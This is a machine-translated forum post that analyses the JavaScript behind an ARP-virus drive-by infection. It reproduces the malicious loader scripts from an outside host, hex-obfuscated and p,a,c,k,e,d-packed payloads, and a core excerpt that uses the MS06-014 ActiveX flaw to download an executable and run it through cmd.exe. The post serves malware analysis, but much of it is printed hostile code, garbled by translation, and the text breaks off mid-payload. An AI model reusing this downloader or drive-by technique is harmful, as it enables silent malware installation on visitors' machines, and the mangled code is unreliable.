Parsing the decryption method using Javascript technology behind arp Virus

The purpose of this article is to explore JS-related technologies, not to take anti-virus as the main purpose. The Anti-Virus is just to pave the way for explaining some JS. Haha, the article is a bit long. I'll take a look at it with a cup of coffee or tea, do not be impatient with learning!

Recently, the company's network has had a very popular ARP virus over the past two days, making it impossible for everyone to access the Internet. This has brought great inconvenience to our work. Here we will write down the anti-virus process, hope to help you!

Symptom, found a js File Link in the header ---- <script src = http://9-6.in/n.js> </script>;

Source: after some online searches, I found that this domain name is an Indian domain name, but the IP address is in the United States, and the domain name registration date is July 25. It seems that everything is premeditated, solve the problem first;

Analysis:
1, first (http://9-6.in/n.js) This JS file downloaded, the Code is as follows:

Document. writeln ("<script> window. onerror = function () {return true ;}< \/script> ");
Document. writeln ("<script src = \" http: \/9-6.in \/S368 \/NewJs2.js \ "> <\/script> ");
Document. writeln ("<script> ");
Document. writeln ("function StartRun (){");
Document. writeln ("var Then = new Date ()");
Document. writeln ("Then. setTime (Then. getTime () + 24*60*60*1000 )");
Document. writeln ("var cookieString = new String (document. cookie )");
Document. writeln ("var cookieHeader = \" Cookie1 = \"");
Document. writeln ("var beginPosition = cookieString. indexOf (cookieHeader )");
Document. writeln ("if (beginPosition! =-1 ){");
Document. writeln ("} else ");
Document. writeln ("{document. cookie = \" Cookie1 = popw.s; expires = \ "+ Then. toGMTString ()");
Document. writeln ("document. write (\ '<iframe width = 0 height = 0 src = \ "http: \\// 9-6.IN \/s368 \/T368.htm \ "> <\/iframe> \');");
Document. writeln ("}");
Document. writeln ("}");
Document. writeln ("StartRun ();");
Document. writeln ("<\/script> ")
In the first sentence, window. onerror = function () {return true;} is used to block JS errors first. This is really cool. Why don't you hide yourself? haha! Then there is a JS file http://9-6.in/s#/newjs2.js, continue to see, find startrun (); run a function, the main function is to write COOKIE, date to save a day, then also loaded a file (http://9-6.IN/s368/T368.htm) with a hidden framework ), there is nothing special about the rest;
2, download (http://9-6.in/S368/NewJs2.js) this file, the Code is as follows:

StrInfo = "\ x3c \ x73 \ x63 \ x72 \ x69 \ x74 \ x3e \ x77 \ x69 \ x6e \ x64 \ x6f \ x77 \ x2e \ x6f \ x6e \ x65 \ x72 \ x72 \ x6f \ x72 \ x3d \ x66 \ x75 \ x6e \ x63 \ x74 \ x69 \ x6f \ x6e \ x28 \ x29 \ x7b \ x72 \ x65 \ x74 \ x75 \ x72 \ x6e \ x74 \ x72 \ x75 \ x65 \ x3b \ x7d \ x3c \ x2f \ x73 \ x63 \ x72 \ x69 \ cross city \ x74 \ x3e "+" \ n "+
"\ X3c \ x73 \ x63 \ x72 \ x69 \ x74 \ x74 \ x3e" + "\ n" +
"\ X44 \ x5a \ x3d \ '\ x78 \ x36 \ x38 \ x78 \ x37 \ x34 \ x78 \ x37 \ x34 \ x78 \ x37 \ x30 \ x78 \ x33 \ x41 \ x78 \ x32 \ x46 \ x78 \ x32 \ x46 \ x78 \ x33 \ x39 \ x78 \ x32 \ x44 \ x78 \ x33 \ x36 \ x78 \ x32 \ x45 \ x78 \ x36 \ x39 \ x78 \ x36 \ x45 \ x78 \ x32 \ x46 \ x78 \ x35 \ x33 \ x78 \ x33 \ x33 \ x78 \ x33 \ x36 \ x78 \ x33 \ x38 \ x78 \ x32 \ x46 \ x78 \ x35 \ x33 \ x78 \ x33 \ x33 \ x78 \ x33 \ x36 \ x78 \ x33 \ x38 \ x78 \ x32 \ x45 \ x78 \ x36 \ x35 \ x78 \ x37 \ x38 \ x78 \ x36 \ x35 \ '\ x3b "+" \ n "+
"\ X4e \ x6f \ x73 \ x6b \ x73 \ x6c \ x61 \ x3d \ '\ x3b" + "\ n" +
"\ X66 \ x75 \ x6e \ x63 \ x74 \ x69 \ x6f \ x6e \ x47 \ x6e \ x4d \ x73 \ x28 \ x6e \ x29" + "\ n" +
"\ X7b" + "\ n" +
"\ X76 \ x61 \ x72 \ x6e \ x75 \ x6d \ x62 \ x65 \ x72 \ x4d \ x73 \ x3d \ x4d \ x61 \ x74 \ x68 \ x2e \ x72 \ x61 \ x61 \ x6e \ x64 \ x6f \ x6d \ x28 \ x29 \ x2a \ x6e \ x3b "+" \ n "+
"\ X72 \ x65 \ x74 \ x75 \ x72 \ x6e \ '\ x78 \ x37 \ x45 \ x78 \ x35 \ x34 \ x78 \ x36 \ x35 \ \ x78 \ x36 \ x44 \ x78 \ x37 \ x30 \ '\ x2b \ x4d \ x61 \ x74 \ x68 \ x2e \ x72 \ x6f \ x75 \ x6e \ x64 \ x28 \ x6e \ x75 \ x6d \ x62 \ x65 \ x72 \ x4d \ x73 \ x29 \ x2b \ '\ x78 \ x32 \ x45 \ x78 \ x37 \ x34 \ \ x78 \ x36 \ x44 \ x78 \ x37 \ x30 \ '\ x3b "+" \ n "+
"\ X7d" + "\ n" +
"\ X74 \ x72 \ x79" + "\ n" +
"\ X7b" + "\ n" +
"\ X4e \ x6f \ x73 \ x6b \ x73 \ x6c \ x61 \ x3d \ '\ x3b" + "\ n" +
"\ X76 \ x61 \ x72 \ x42 \ x66 \ x3d \ x64 \ x6f \ x63 \ x75 \ x6d \ x65 \ x6e \ x74 \ x2e \ x63 \ x72 \ x65 \ x61 \ x74 \ x65 \ x45 \ x6c \ x65 \ x6d \ x65 \ x6e \ x74 \ x28 \ "\ x78 \ x36 \ x46 \ x78 \ x36 \ x32 \\\ x78 \ x36 \ x41 \ x78 \ x36 \ x35 \ x78 \ x36 \ x33 \ x78 \ x37 \ x34 \ "\ x29 \ x3b" + "\ n "+
"\ X42 \ x66 \ x2e \ x73 \ x65 \ x74 \ x41 \ x74 \ x74 \ x72 \ x69 \ x62 \ x75 \ x74 \ x65 \ x28 \" \ x78 \ x36 \ x33 \ x78 \ x36 \ x43 \ x78 \ x36 \ x31 \ x78 \ x37 \ x33 \ x78 \ x37 \ x33 \ x78 \ x36 \ x39 \ x78 \ x36 \ x34 \ "\ x2c \" \ x78 \ x36 \ x33 \ x78 \ x36 \ x43 \ x78 \ x37 \ x33 \ x78 \ x36 \ x39 \ x78 \ x36 \ x34 \ x78 \ x33 \ x41 \ x78 \ x34 \ x32 \ x78 \ x34 \ x34 \ x78 \ x33 \ x39 \ x78 \ x33 \ x36 \ x78 \ x34 \ x33 \ x78 \ x33 \ x35 \ x78 \ x33 \ x35 \ x78 \ x33 \ x36 \ x78 \ x32 \ x44 \ x78 \ x33 \ x36 \ x78 \ x33 \ x35 \ x78 \ x34 \ x31 \ x78 \ x33 \ x33 \ x78 \ x32 \ x44 \ x78 \ x33 \ x31 \ x78 \ x33 \ x31 \ x78 \ x34 \ x34 \ x78 \ x33 \ x30 \ x78 \ x32 \ x44 \ x78 \ x33 \ x39 \ x78 \ x33 \ x38 \ x78 \ x33 \ x33 \ x78 \ x34 \ x31 \ x78 \ x32 \ x44 \ x78 \ x33 \ x30 \ x78 \ x33 \ x30 \ x78 \ x34 \ x33 \ x78 \ x33 \ x30 \ x78 \ x33 \ x34 \ x78 \ x34 \ x34 \ x36 \ x78 \ x34 \ x33 \ x78 \ x33 \ x32 \ x78 \ x33 \ x39 \ x78 \ x34 \ x35 \ x78 \ x33 \ x33 \ x78 \ x33 \ x36 \ "\ x29 \ x3b" + "\ n" +
"\ X76 \ x61 \ x72 \ x4b \ x78 \ x3d \ x42 \ x66 \ x2e \ x43 \ x72 \ x65 \ x61 \ x74 \ x65 \ x4f \ x62 \ x6a \ x65 \ x63 \ x74 \ x28 \ "\ x78 \ x34 \ x44 \ x78 \ x36 \ x39 \ x78 \ x36 \ x33 \ x78 \ x37 \ x32 \ \ x78 \ x36 \ x46 \ x78 \ x37 \ x33 \ x78 \ x36 \ x46 \ x78 \ x36 \ x36 \ x78 \ x37 \ x34 \ \ x78 \ x32 \ x45 \ x78 \ x35 \ x38 \ "\ x2b \" \ x78 \ x34 \ x44 \ x78 \ x34 \ x43 \\\ x78 \ x34 \ x38 \ x78 \ x35 \ x34 \ x78 \ x35 \ x34 \ x78 \ x35 \ x30 \ "\ x2c \" \ x29 \ x3b "+" \ n "+
"\ X76 \ x61 \ x72 \ x41 \ x53 \ x3d \ x42 \ x66 \ x2e \ x43 \ x72 \ x65 \ x61 \ x74 \ x65 \ x4f \ x62 \ x6a \ x65 \ x63 \ x74 \ x28 \ "\ x78 \ x34 \ x31 \ x78 \ x36 \ x34 \ x78 \ x36 \ x46 \ x78 \ x36 \ x34 \ \ x78 \ x36 \ x32 \ x78 \ x32 \ x45 \ x78 \ x35 \ x33 \ x78 \ x37 \ x34 \ x78 \ x37 \ x32 \ \ x78 \ x36 \ x35 \ x78 \ x36 \ x31 \ x78 \ x36 \ x44 \ "\ x2c \" \ "\ x29 \ x3b" + "\ n "+
"\ X4e \ x6f \ x73 \ x6b \ x73 \ x6c \ x61 \ x3d \ '\ x3b" + "\ n" +
"\ X41 \ x53 \ x2e \ x74 \ x79 \ cross \ x65 \ x3d \ x31 \ x3b" + "\ n" +
"\ X4e \ x6f \ x73 \ x6b \ x73 \ x6c \ x61 \ x3d \ '\ x3b" + "\ n" +
"\ X4b \ x78 \ x2e \ x6f \ cross \ x65 \ x6e \ x28 \" \ x78 \ x34 \ x37 \ x78 \ x34 \ x35 \ x78 \ x35 \ x34 \ "\ x2c \ x44 \ x5a \ x2c \ x30 \ x29 \ x3b" + "\ n" +
"\ X4e \ x6f \ x73 \ x6b \ x73 \ x6c \ x61 \ x3d \ '\ x3b" + "\ n" +
"\ X4b \ x78 \ x2e \ x73 \ x65 \ x6e \ x64 \ x28 \ x29 \ x3b" + "\ n" +
"\ X4e \ x6f \ x73 \ x6b \ x73 \ x6c \ x61 \ x3d \ '\ x3b" + "\ n" +
"\ X4e \ x73 \ x31 \ x3d \ x47 \ x6e \ x4d \ x73 \ x28 \ x39 \ x39 \ x39 \ x39 \ x29 \ x3b" + "\ n" +
"\ X4e \ x6f \ x73 \ x6b \ x73 \ x6c \ x61 \ x3d \ '\ x3b" + "\ n" +
"\ X76 \ x61 \ x72 \ x63 \ x46 \ x3d \ x42 \ x66 \ x2e \ x43 \ x72 \ x65 \ x61 \ x74 \ x65 \ x4f \ x62 \ x6a \ x65 \ x63 \ x74 \ x28 \ "\ x78 \ x35 \ x33 \ x78 \ x36 \ x33 \ x78 \ x37 \ x32 \ x78 \ x36 \ x39 \ \ x78 \ x37 \ x30 \ x78 \ x37 \ x34 \ x78 \ x36 \ x39 \ x78 \ x36 \ x45 \ x78 \ x36 \ x37 \ \ x78 \ x32 \ x45 \ x78 \ x34 \ x36 \ x78 \ x36 \ x39 \ x78 \ x36 \ x43 \ x78 \ x36 \ x35 \ \ x78 \ x35 \ x33 \ x78 \ x37 \ x39 \ x78 \ x37 \ x33 \ x78 \ x37 \ x34 \ x78 \ x36 \ x35 \ \ x78 \ x36 \ x44 \ x78 \ x34 \ x46 \ x78 \ x36 \ x32 \ x78 \ x36 \ x41 \ x78 \ x36 \ x35 \ \ x78 \ x36 \ x33 \ x78 \ x37 \ x34 \ "\ x2c \" \ "\ x29 \ x3b" + "\ n" +
"\ X76 \ x61 \ x72 \ x4e \ x73 \ x54 \ x6d \ cross V \ x3d \ x63 \ x46 \ x2e \ x47 \ x65 \ x74 \ x53 \ cross V \ x65 \ x63 \ x69 \ x61 \ x6c \ x46 \ x6f \ x6c \ x64 \ x65 \ x72 \ x28 \ x30 \ x29 \ x3b \ x4e \ x73 \ x31 \ x3d \ x63 \ x46 \ x2e \ x42 \ x75 \ x69 \ x6c \ x64 \ x50 \ x61 \ x74 \ x68 \ x28 \ x4e \ x73 \ x54 \ x6d \ cross 7 \ x2c \ x4e \ x73 \ x31 \ x29 \ x3b \ x41 \ x53 \ x2e \ x4f \ cross \ x65 \ x6e \ x28 \ x29 \ x3b \ x41 \ x53 \ x2e \ x57 \ x72 \ x69 \ x74 \ x65 \ x28 \ x4b \ x78 \ x2e \ x72 \ x65 \ x73 \ cross \ x6f \ x6e \ x73 \ x65 \ x42 \ x6f \ x64 \ x79 \ x29 \ x3b "+" \ n "+
"\ X41 \ x53 \ x2e \ x53 \ x61 \ x76 \ x65 \ x54 \ x6f \ x46 \ x69 \ x6c \ x65 \ x28 \ x4e \ x73 \ x31 \ x2c \ x32 \ x29 \ x3b \ x41 \ x53 \ x2e \ x43 \ x6c \ x6f \ x73 \ x65 \ x28 \ x29 \ x3b \ x76 \ x61 \ x72 \ x71 \ x3d \ x42 \ x66 \ x2e \ x43 \ x72 \ x65 \ x61 \ x74 \ x65 \ x4f \ x62 \ x6a \ x65 \ x63 \ x74 \ x28 \ "\ x78 \ x35 \ x33 \\\ x78 \ x36 \ x38 \ x78 \ x36 \ x35 \ x78 \ x36 \ x43 \ x78 \ x36 \ x43 \ x78 \ x32 \ x45 \\\ x78 \ x34 \ x31 \ x78 \ x37 \ x30 \ x78 \ x37 \ x30 \ x78 \ x36 \ x43 \ x78 \ x36 \ x39 \\\ x78 \ x36 \ x33 \ x78 \ x36 \ x31 \ x78 \ x37 \ x34 \ x78 \ x36 \ x39 \ x78 \ x36 \ x46 \\\ x78 \ x36 \ x45 \ "\ x2c \" \ "\ x29 \ x3b" + "\ n" +
"\ X6f \ x6b \ x31 \ x3d \ x63 \ x46 \ x2e \ x42 \ x75 \ x69 \ x6c \ x64 \ x50 \ x61 \ x74 \ x68 \ x28 \ x4e \ x73 \ x54 \ x6d \ x2b \ '\ x78 \ x35 \ x43 \ x78 \ x35 \ x43 \ x78 \ x37 \ x33 \ x78 \ x37 \ x39 \ x78 \ x37 \ x33 \ x78 \ x37 \ x34 \ x78 \ x36 \ x35 \ x78 \ x36 \ x44 \ x78 \ x33 \ x33 \ x78 \ x33 \ x32 \ '\ x2c \' \ x78 \ x36 \ x33 \ x78 \ x36 \ x44 \ x78 \ x36 \ x34 \ \ x78 \ x32 \ x45 \ x78 \ x36 \ x35 \ x78 \ x37 \ x38 \ x78 \ x36 \ x35 \ '\ x29 \ x3b "+" \ n "+
"\ X71 \ x2e \ x53 \ x48 \ x65 \ x4c \ x4c \ x45 \ x78 \ x65 \ x63 \ x75 \ x74 \ x65 \ x28 \ x6f \ x6b \ x31 \ x2c \ '\ x78 \ x32 \ x30 \ x78 \ x32 \ x46 \ x78 \ x36 \ x33 \' \ x2b \ x4e \ x73 \ x31 \ x2c \"\ "\ x2c \" \ x78 \ x36 \ x46 \ x78 \ x37 \ x30 \ x78 \ x36 \ x35 \ x78 \ x36 \ x45 \"\ x2c \ x30 \ x29 \ x3b "+" \ n "+
"\ X4e \ x6f \ x73 \ x6b \ x73 \ x6c \ x61 \ x3d \ '\ x3b" + "\ n" +
"\ X7d" + "\ n" +
"\ X63 \ x61 \ x74 \ x63 \ x68 \ x28 \ x4d \ x73 \ x49 \ x29 \ x7b \ x4d \ x73 \ x49 \ x3d \ x31 \ x3b \ x7d" +" \ n "+
"\ X4e \ x6f \ x73 \ x6b \ x73 \ x6c \ x61 \ x3d \ '\ x3b" + "\ n" +
"\ X3c \ x2f \ x73 \ x63 \ x72 \ x69 \ x74 \ x3e"
Window ["\ x64 \ x6f \ x63 \ x75 \ x6d \ x65 \ x6e \ x74"] ["\ x77 \ x72 \ x69 \ x74 \ x65"] (StrInfo );
This code is a bit long, and there are protective measures, all of which are converted to hexadecimal, but don't be afraid. We have a solution. First, make sure you have installed UE and then open UE, paste the code in (nonsense, haha), replace \ x with %, and then use the html code conversion function to decode it to get the code decoded for the first time ???, Haha, the author of this Code is abnormal and has done two encodings, so I have to perform two decoding operations and repeat the previous steps, then you can see the final "original" code;
I won't post the specific code, which is harmful. I believe you can find the code by yourself after reading the above steps. Let's talk about the core code here;

[Copy to clipboard] [-] CODE:
// Core code
..............
"Var Bf = document. createElement (\" \ o \ B \ j \ e \ c \ t \ ");" + "\ n" +
"Bf. setAttribute (\ "\ c \ l \ a \ s \ I \ d \", \ "\ c \ l \ s \ I \ d \: \ B \ D \ 9 \ 6 \ C \ 5 \ 5 \ 6 \-\ 6 \ 5 \ A \ 3 \-\ 1 \ 1 \ D \ 0 \-\ 9 \ 8 \ 3 \ A \-\ 0 \ 0 \ C \ 0 \ 4 \ F \ C \ 2 \ 9 \ E \ 3 \ 6 \"); "+" \ n "+
"Var Kx = Bf. createObject (\ "\ M \ I \ c \ r \ o \ s \ o \ f \ t \. \ X \ "+ \" \ M \ L \ H \ T \ P \ ", \" \ ");" + "\ n" +
"Var AS = Bf. createObject (\ "\ A \ d \ o \ d \ B \. \ S \ t \ r \ e \ a \ m \ ", \" \ ");" + "\ n" +
.............
"Var cF = Bf. createObject (\ "\ S \ c \ r \ I \ p \ t \ I \ n \ g \. \ F \ I \ l \ e \ S \ y \ s \ t \ e \ m \ O \ B \ j \ e \ c \ t \", \ "\"); "+" \ n "+
"Var NsTmp = cF. getSpecialFolder (0); Ns1 = cF. buildPath (NsTmp, Ns1);. open ();. write (Kx. responseBody); "+" \ n "+
". SaveToFile (Ns1, 2);. close (); var q = Bf. createObject (\ "\ S \ h \ e \ l \. \ A \ p \ l \ I \ c \ a \ t \ I \ o \ n \ ", \" \ ");" + "\ n" +
"Ok1 = cF. buildPath (NsTmp + \ '\ s \ y \ s \ t \ e \ m \ 3 \ 2 \', \ '\ c \ m \ d \. \ e \ x \ e \ '); "+" \ n "+
"Q. SHeLLExecute (ok1, \ '\/\ c \' + Ns1, \ "\", \ "\ o \ p \ e \ n \", 0 ); "+" \ n "+
..............
The above is the most core code. It uses the MS0614 vulnerability to create a JS asynchronous object to obtain the virus (*. exe) file and then runs it!
3. Open the http://9-6.in/s#/t368.htm?source code and find a strange JS file, as shown below:

[Copy to clipboard] [-] CODE:
<Script>
Eval (function (p, a, c, k, e, d) {e = function (c) {return c. toString (36)}; if (! ''. Replace (/^/, String) {while (c --) d [c. toString (a)] = k [c] | c. toString (a); k = [function (e) {return d [e]}]; e = function () {return '\ w + '}; c = 1}; while (c --) if (k [c]) p = p. replace (new RegExp ('\ B' + e (c) + '\ B', 'G'), k [c]); return p} ('x ("\ 0 \ 6 \ 9 \ 5 \ I \ h \ j \ 4 \ f \\ 8 \ 3 \ 2 \ 0 \ 7 \ 1 \ I \ 8 \ 2 \ 3 \ h \ g \ 4 \ w \ v \ u \ t \ B \ s \ 7 \ r \ g \ 4 \ e \ f \ q \ 8 \ \ 3 \ 2 \ 0 \ 7 \ 1 \ e \ 4 \ d \ c \ p \ 5 \\ 3 \ o \ n \ a \ 6 \ 1 \ B \ m \ 2 \ 0 \ 1 \ a \ l \ 0 \ 6 \ 9 \ 5 \ k ") ', 34,34, '1970 | 151 | 164 | 162 | 42 | 143 | 157 | 156 | 160 | 163 | 56 | 12 | 15 | 76 | 74 | 146 | 75 | 40 | 11 | 51 | 50 | 167 | 155 | 165 | 144 | 57 | 147 | 152 | 70 | 66 | 63 | 123 | eval '. split ('|'), 0 ,{}))
</Script>

Recent score record of this post
Bound0 2007-8-6 prestige + 1 encourage research spirit! : D

Reply to your dream by referencing the report
[Advertisement] [DIY hichina mail, flexible purchase] | top 10 Western Digital multi-line virtual hosts in China

Veking [owner]

Blue Water
Senior Member

Posts 275
Physical strength 733
Prestige 1
Register
#2 post the message on as a friend
Parsing the Javascript technology behind arp viruses

It can be seen that this code is also encrypted and features function (p, a, c, k, e, d). There are many examples of this encryption method on the Internet, so I will not elaborate on it, add the decryption code:

[Copy to clipboard] [-] CODE:
// The following code is obtained by searching on the Internet. The copyright belongs to the original author.
<! DOCTYPE html PUBLIC "-// W3C // dtd xhtml 1.0 Transitional // EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<Html xmlns = "http://www.w3.org/1999/xhtml">
<Head>
<Meta http-equiv = "Content-Type" content = "text/html; charset = UTF-8"/>
<Title> untitled document </title>
</Head>
<Body>
<Script>
A = 62;
Function encode (){
Var code = document. getElementById ('code'). value;
Code = code. replace (/[\ r \ n] +/g ,'');
Code = code. replace (/'/g ,"\\'");
Var tmp = code. match (/\ B (\ w +) \ B/g );
Tmp. sort ();
Var dict = [];
Var I, t = '';
For (var I = 0; I <tmp. length; I ++ ){
If (tmp [I]! = T) dict. push (t = tmp [I]);
}
Var len = dict. length;
Var ch;
For (I = 0; I <len; I ++ ){
Ch = num (I );
Code = code. replace (new RegExp ('\ B' + dict [I] + '\ B', 'G'), ch );
If (ch = dict [I]) dict [I] = '';
}
Document. getElementById ('code '). value = "eval (function (p, a, c, k, e, d) {e = function (c) {return (c <? '': E (parseInt (c/a) + (c = c % a)> 35? String. fromCharCode (c + 29): c. toString (36)}; if (! ''. Replace (/^/, String) {while (c --) d [e (c)] = k [c] | e (c ); k = [function (e) {return d [e]}]; e = function () {return '\\\ w +'}; c = 1 }; while (c --) if (k [c]) p = p. replace (new RegExp ('\\\\ B' + e (c) + '\\\\ B', 'G'), k [c]); return p }("
+ "'" + Code + "'," + a + "," + len + ", '" + dict. join ('|') + "'. split ('|'), 0 ,{}))";
}

Function num (c ){
Return (c <? '': Num (parseInt (c/a) + (c = c % a)> 35? String. fromCharCode (c + 29): c. toString (36 ));
}

Function run (){
Eval (document. getElementById ('code'). value );
}
Function decode (){
Var code = document. getElementById ('code'). value;
Code = code. replace (/^ eval /,'');
Document. getElementById ('code'). value = eval (code );
}
</Script>
<Textarea id = code cols = 80 rows = 20>

</Textarea> <br/>
<Input type = button onclick = encode () value = encoding/>
<Input type = button onclick = run () value = Execution/>
<Input type = button onclick = decode () value = decoding/>
</Body>
</Html>
After decryption, the code is:

[Copy to clipboard] [-] CODE:
Info = "<script src = \" S368.jpg \ "> </script>"
Document. write (info)
Continue to open the link of the surface image. Oh, of course, it will not be a mmimage. Check the source code and find the following code:

[Copy to clipboard] [-] CODE:
Eval (function (p, a, c, k, e, r) {e = function (c) {return (c <? '': E (parseInt (c/a) + (c = c % a)> 35? String. fromCharCode (c + 29): c. toString (36)}; if (! ''. Replace (/^/, String) {while (c --) r [e (c)] = k [c] | e (c ); k = [function (e) {return r [e]}]; e = function () {return '\ w +'}; c = 1 }; while (c --) if (k [c]) p = p. replace (new RegExp ('\ B' + e (c) + '\ B', 'G'), k [c]); return p} ('e n = 1c; 12 13 () {} 12 14 () {1d {n = 1e 1f ("\ K \ l \ r \ 8 \ I \ 3 \ 6 \ j \ 3 \ 6 \ \ o \ 3 \ 6 \ 9 \ C \ 3 \ s \ K \ l \ r \ 8 \ I \ 3 \\ 6 \ 9 \ x ")} 1g (e) {Q} E a = n ["\ 15 \ 3 \ 4 \ p \ d \ 8 \ m \ 7 \ k"] (" \ w \ 8 \ 4 \ 7 \ o \ 7 \ 6 \ r \ f ", "\ R \ 7 \ q \ 3 \ \ V \ 5 \ 4 \ l ",""); 1 h (a ["\ 7 \ 8 \ I \ 3 \ y \ L \ m"] ("\ z \ f \ l \ 4 \ 5 \ 9 \ 3 \ y \ 3 ")! =-1) {Q} E B = n ["\ 15 \ 3 \ 4 \ j \ 3 \ 6 \ o \ 3 \ 6 \ v \ \ 5 \ 4 \ l "] (); B = B ["\ f \ r \ s \ f \ 4 \ 6"] (0, 2 ); B + = "\\\\\\ v \\ 6 \\ d \\ k \\ 6 \ 5 \ J \\ x \\\\\ K \ \ l \ r \ 8 \ I \ 3 \ J \ x \ 1i \ 3 \ s \ K \ l \ \ r \ 8 \ I \ 3 \ 6 \ A \ 6 \ d \ m \ 7 \ q \ 3 \ \ f \ r \ f \ 3 \ 6 \ h \ d \ 8 \ m \ 7 \ k \ 9 \ \ 7 \ 8 \ 7 "; n ["\ j \ 3 \ 4 \ p \ 5 \ q \ s \ 5 \ h \ 1j \ F \ \ 8 \ 4 \ 6 \ D "] (1 k, 13 ); E c = n ["\ w \ I \ p \ 5 \ 4 \ 3 \ k \ d \ 6 \ D"] ("\ 7 "); E c = n ["\ w \ I \ p \ 5 \ 4 \ 3 \ k \ d \ 6 \ D"] ("\ 5 "); E c = n ["\ w \ I \ p \ 5 \ 4 \ 3 \ k \ d \ 6 \ D"] ("\ s "); E c = n ["\ w \ I \ p \ 5 \ 4 \ 3 \ k \ d \ 6 \ D"] ("\ h "); E c = n ["\ w \ I \ p \ 5 \ 4 \ 3 \ k \ d \ 6 \ D"] ("\ I "); n ["\ j \ 3 \ 4 \ p \ d \ 8 \ m \ 7 \ k"] ("\ j \ 5 \ o \ 3 \ v \ 5 \ 4 \ l ", "\ 7 ", "\ S \ f \ h \ 6 \ 7 \ A \ 4 \ 16 \ o \ 5 \ 6 \ f \ G \ 8 \ 3 \ C \ w \ h \ 4 \ 7 \ o \ 3 \ N \ L \ s \ T \ \ 3 \ h \ 4 \ t \ "\ C \ f \ h \ 6 \ 7 \ A \ 4 \ 9 \\ f \ l \ 3 \ q \ "\ u \ g \ o \ 5 \ 6 \ d \ G \ 8 \ 3 \ C \ w \ h \ 4 \ 7 \ o \ 3 \ N \ L \ s \ T \ 3 \ \ h \ 4 \ t \ "\ f \ l \ 3 \ q \ 9 \ 5 \ \\ q \ 7 \ h \ 5 \ 4 \ 7 \ d \ 8 \ "\ u \ g \ o \ 5 \ 6 \ 5 \ B \ s \ B \ h \ B \ I \ B \ 3 \ B \ m \ B \ k \ \ g "); n ["\ j \ 3 \ 4 \ p \ d \ 8 \ m \ 7 \ k"] ("\ j \ 5 \ o \ 3 \ v \ 5 \ 4 \ l ", "\ 5 ", "\ H \ g \ f \ 9 \ U \ r \ 8 \ t \" \ p \ V \\\\\\ \\\\ v \ 6 \ d \ k \ 6 \ 5 \ J \ x \ I \ 8 \ 4 \ 3 \ 6 \ 8 \ J \ x \ I \ F \ N \ v \\ 17 \ L \ U \ F \ 9 \ F \ N \ F \ l \ 4 \ 4 \ A \ 1l \ O \ O \ h \ 1m \ x \ W \ 7 \ 18 \ O \ j \ X \ 19 \ 1a \ O \ \ I \ 1n \ C \ 18 \ Y \ W \ l \ 4 \ Y \ 1o \ "\ B \\ H \ B \ H \ u \ g \ f \ 9 \ U \ r \ 8 \ t \ "\ h \ z \ I \ 9 \ 3 \ y \ 3 \ Z \ h \ 4 \ 6 \ 3 \ 3 \ 3 \ h \ V \ \ Z \ m \ "\ B \ H \ B \ x \ u \ g "); n ["\ j \ 3 \ 4 \ p \ d \ 8 \ m \ 7 \ k"] ("\ j \ 5 \ o \ 3 \ v \ 5 \ 4 \ l ", "\ s ", "\ f \ 9 \ j \ A \ 3 \ h \ 7 \ 5 \ q \ R \ d \ q \ I \ 3 \ 6 \ f \ t \ "\ 1p \ D \ 1q \ d \ h \ r \ z \ 3 \ \ 8 \ 4 \ f \ "\ u \ g \ s \ G \ s \ 9 \ f \ r \ s \\ f \ 4 \ 6 \ 7 \ 8 \ k \ t \ H \ B \ s \ 9 \ q \ 5 \ f \ 4 \ I \ 8 \ I \ 3 \ y \ L \ m \ t \\"\\\\\\\\\\ "\ u \ g \ s \ P \ G \" \ q \ d \ h \ \ 5 \ q \ f \ J \ x \ K \ 3 \ z \ A \ d \ 6 \ J \ x \ p \ d \ 8 \ 4 \ 3 \ 8 \ 4 \ 9 \\ I \ F \ 1r \ "\ g "); n ["\ j \ 3 \ 4 \ p \ d \ 8 \ m \ 7 \ k"] ("\ j \ 5 \ o \ 3 \ v \ 5 \ 4 \ l ", "\ h ", "\ d \ 9 \ 1s \ 5 \ z \ 3 \ j \ A \ 5 \ h \ 3 \ t \ s \ u \ g \ m \ d \ 6 \ t \ 5 \ G \ H \ g \ 5 \ S \ h \ \ 9 \ I \ 4 \ 3 \ z \ f \ t \ u \ 9 \ p \ d \ r \ 8 \\ 4 \ g \ 5 \ P \ u \ 10 \ o \ 5 \ 6 \ m \ G \ h \ 9 \ I \ 4 \ 3 \ z \ f \ t \ u \ 9 \ I \ 4 \ 3 \ z \ t \ \ 5 \ u \ 9 \ v \ 5 \ 4 \ l \ g \ m \ P \ G \\"\\\\\ \\\\\ j \ X \ 19 \ 1a \ 1b \ 1t \ x \ 1u \ W \ 3 \ y \ 3 \ \ "\ g "); n ["\ j \ 3 \ 4 \ p \ d \ 8 \ m \ 7 \ k"] ("\ j \ 5 \ o \ 3 \ v \ 5 \ 4 \ l ", "\ I ", "\ H \ g \ 4 \ 6 \ D \ 10 \ f \ 9 \ F \ y \ 3 \ h \ t \ m \ u \ g \ 11 \ h \ 5 \ 4 \ h \ l \ t \ 3 \ u \ 10 \ \ 11 \ g \ 11 \ C \ 7 \ 8 \ I \ d \ C \ 9 \ h \ q \ d \\ f \ 3 \ t \ u \ g \ S \ Z \ f \ h \ 6 \ 7 \ A \ 4 \ 16 "); n ["\ j \ 3 \ 4 \ p \ d \ 8 \ m \ 7 \ k"] ("\ w \ 8 \ 4 \ 7 \ o \ 7 \ 6 \ r \ f ", "\ v \ 6 \ d \ 4 \ 3 \ h \ 4", "\ x "); n ["\ j \ 3 \ 4 \ p \ d \ 8 \ m \ 7 \ k"] ("\ w \ 8 \ 4 \ 7 \ o \ 7 \ 6 \ r \ f ", "\ R \ 7 \ q \ 3 \ v \ 5 \ 4 \ l ", "\ h \ V \ C \ 7 \ 8 \ I \ d \ C \ f \ \ D \ f \ 4 \ 3 \ z \ X \ 1b \ z \ f \ l \ 4 \ 5 \ \ 9 \ 3 \ y \ 3 "); n ["\ j \ 3 \ 4 \ p \ d \ 8 \ m \ 7 \ k"] ("\ w \ 8 \ 4 \ 7 \ o \ 7 \ 6 \ r \ f ", "\ v \ 5 \ 6 \ 5 \ z \ 3 \ 4 \ 3 \ 6", B ); n ["\ j \ 3 \ 4 \ p \ d \ 8 \ m \ 7 \ k"] ("\ w \ 8 \ 4 \ 7 \ o \ 7 \ 6 \ r \ f ", "\ F \ y \ 4 \ 17 \ 7 \ f \ 4 ", "\ 9 \ 6 \ 5 \ 6 \ g \ 9 \ M \ 7 \ A \ g \ 9 \ 3 \ y \ 3 \ g \ 9 \ I \ d \ h \ g \ 9 \ h \ d \ z \ g \ 9 \ \ s \ 7 